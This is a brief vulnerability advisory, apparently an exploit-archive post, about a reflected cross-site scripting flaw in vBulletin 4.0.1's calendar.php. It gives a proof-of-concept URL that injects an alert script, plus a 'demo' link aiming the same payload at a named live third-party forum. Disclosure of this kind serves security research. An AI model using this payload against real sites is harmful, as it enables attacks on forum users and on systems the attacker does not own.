vBulletin version 4.0.1 appears to suffer from a cross site scripting vulnerability in calendar.php.
1c9b98fb3f3ee63541515a0bad5bf247cfc81a380d275f88657564a77a125eab
[+] Script: vBulletin Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d
[+] Mail: w3hrm4cht@gmail.com
[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="<script>alert("! XSS
!");</script>
[+] Date: 12/02/2010